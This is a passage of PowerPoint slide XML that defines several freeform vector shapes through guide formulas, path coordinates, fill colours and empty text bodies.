              <a:gd name="T8" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T21" fmla="*/ 0 h 11"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T23" fmla="*/ 0 h 11"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T25" fmla="*/ 0 h 11"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T27" fmla="*/ 0 h 11"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T66" fmla="*/ 0 w 37"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T68" fmla="*/ 0 w 37"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 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1"/>
              <a:gd name="T107" fmla="*/ 37 w 37"/>
              <a:gd name="T108" fmla="*/ 11 h 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1">
                <a:moveTo>
                  <a:pt x="0" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10406" name="Freeform 487"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1490662" y="6226175"/>
            <a:ext cx="138113" cy="255588"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 61"/>
              <a:gd name="T1" fmla="*/ 0 h 113"/>
              <a:gd name="T2" fmla="*/ 0 w 61"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 113"/>
              <a:gd name="T34" fmla="*/ 0 w 61"/>
              <a:gd name="T35" fmla="*/ 0 h 1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1"/>
              <a:gd name="T55" fmla="*/ 0 h 113"/>
              <a:gd name="T56" fmla="*/ 61 w 61"/>
              <a:gd name="T57" fmla="*/ 113 h 1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1" h="113">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="96"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="001999"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10407" name="Freeform 488"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1558925" y="6167438"/>
            <a:ext cx="177800" cy="33337"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 79"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T2" fmla="*/ 0 w 79"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T35" fmla="*/ 0 h 15"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T37" fmla="*/ 0 h 15"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T39" fmla="*/ 0 h 15"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T41" fmla="*/ 0 h 15"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T43" fmla="*/ 0 h 15"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T45" fmla="*/ 0 h 15"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T47" fmla="*/ 0 h 15"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T49" fmla="*/ 0 h 15"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T66" fmla="*/ 0 w 79"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T68" fmla="*/ 0 w 79"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 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9"/>
              <a:gd name="T106" fmla="*/ 0 h 15"/>
              <a:gd name="T107" fmla="*/ 79 w 79"/>
              <a:gd name="T108" fmla="*/ 15 h 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9" h="15">
                <a:moveTo>
                  <a:pt x="0" y="15"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="333333"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10408" name="Freeform 489"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1457325" y="6486525"/>
            <a:ext cx="298450" cy="101600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T34" fmla="*/ 0 w 132"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T37" fmla="*/ 0 h 45"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 4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45"/>
              <a:gd name="T119" fmla="*/ 132 w 132"/>
              <a:gd name="T120" fmla="*/ 45 h 4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45">
                <a:moveTo>
                  <a:pt x="55" y="44"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="56" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="44"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10409" name="Freeform 490"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1393825" y="6513513"/>
            <a:ext cx="304800" cy="90487"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 135"/>
              <a:gd name="T1" fmla="*/ 0 h 40"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 135"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 40"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 135"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 40"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 135"/>
              <a:gd name="T7" fmla="*/ 0 h 40"/>
              <a:gd name="T8" fmla="*/ 0 w 135"/>
              <a:gd name="T9" fmla="*/ 0 h 40"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 135"/>
              <a:gd name="T16" fmla="*/ 0 h 40"/>
              <a:gd name="T17" fmla="*/ 135 w 135"/>
              <a:gd name="T18" fmla="*/ 40 h 40"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
